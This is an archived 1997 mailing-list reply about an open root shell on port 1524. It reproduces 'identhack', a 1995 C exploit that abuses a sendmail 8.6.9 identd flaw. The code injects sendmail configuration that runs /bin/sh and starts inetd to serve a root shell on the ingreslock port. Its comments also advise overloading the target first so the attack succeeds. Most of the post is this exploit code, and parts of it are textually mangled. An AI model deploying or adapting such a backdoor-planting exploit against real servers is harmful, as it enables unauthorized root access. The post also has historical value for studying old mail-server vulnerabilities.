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Re: Ingreslock Misconfiguration?

From: panzer () DHP COM (Matt)
Date: Tue, 28 Jan 1997 06:52:21 GMT

Khelbin Sunvold <khelbin () CONNIX COM> wrote:
: Just fooling around the other day on a box running ingres and i tried
: telneting to port 1524 (ingreslock) and was surprised to be dropped into a
: root shell.

Perhaps they were running 8.6.9 also....  See below:
 -Matt (panzer () dhp com)  --  DataHaven Project - http://www.dhp.com/
  "That which can never be enforced should not be prohibited."

/* identhack - sendmail identd hack.
 * Michael R. Widner - atreus (2/24/95)
 * <widner () uchicago edu> <atreus () primus com>
 * Make sure you don't do anything evil with this.  That would be wrong.
 * This is a real simple hacked identd that will return a string to abuse
 * the sendmail 8.6.9 identd problem.
 * NOTE:  This hack only works when sendmail queues up the message for
 * later delivery.  This depends on the configuration of sendmail.cf and
 * on the machine loading.  If you can do something to drag the machine to
 * its knees, then fire off this attack, you stand a much better chance of
 * success.
 * This should compile ok with just [g]cc -o identhack identhack.c
 * Then add an appropriate entry in your inetd.conf and kill -HUP identd.
 * ident  stream tcp  nowait  root  /tmp/identhack  in.identd
 * (identd port is 113, but hopefully your /etc/services knows that)
 * Two noteworthy things:  Most people configure their sendmail.cf with
 * Og1 and Ou1 lines, setting the default user to bin.bin.  I see no way
 * to break root using this method if this is the case.  bin seems like the
 * best case scenario.

#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* TIMEOUT is the number of seconds to wait before closing the connection if
 * the client doesn't provide the port pairs.
#define TIMEOUT 120

/* PROCINFO_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE      2048
#define SOCKET_BUFFER_SIZE      100

unsigned short lport = 0, rport = 0;

main ()
    unsigned long here, there;
    struct fd_set fdset;
    struct timeval timeout;
    char buffer[OUTPUT_BUFFER_SIZE];
    char inbuffer[SOCKET_BUFFER_SIZE];
    int len;
    int fd;

    /* prepare to read ports */
    FD_ZERO (&fdset);
    FD_SET (0, &fdset);
    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;

    /* read ports from stdin */
    select (1, &fdset, NULL, NULL, &timeout);
    len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );
    if (len <= 0)
            exit (0);
    FD_SET (0, &fdset);

    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
    "atreus)\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c 
$u\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > /tmp/badfile\">\r\nR<\"|/usr/etc/inetd 
/tmp/badfile\">\r\n$rascii The choice
 of commands to execute is virtually limitless.  I chose to startup a copy of inetd with /bin/sh answering on the 
ingreslock port, which is 1524.  I only chose this particular port because it's in most /etc/services and sun inetd 
won't accept port numbers
 here, only services defined in /etc/services or services.byname if you're using yp.  Of course the syntax will vary by 
systems, as will the location of inetd.  So an intruder must at least know what type of system he's going after.");
    write (1, buffer, strlen (buffer));
    exit (0);

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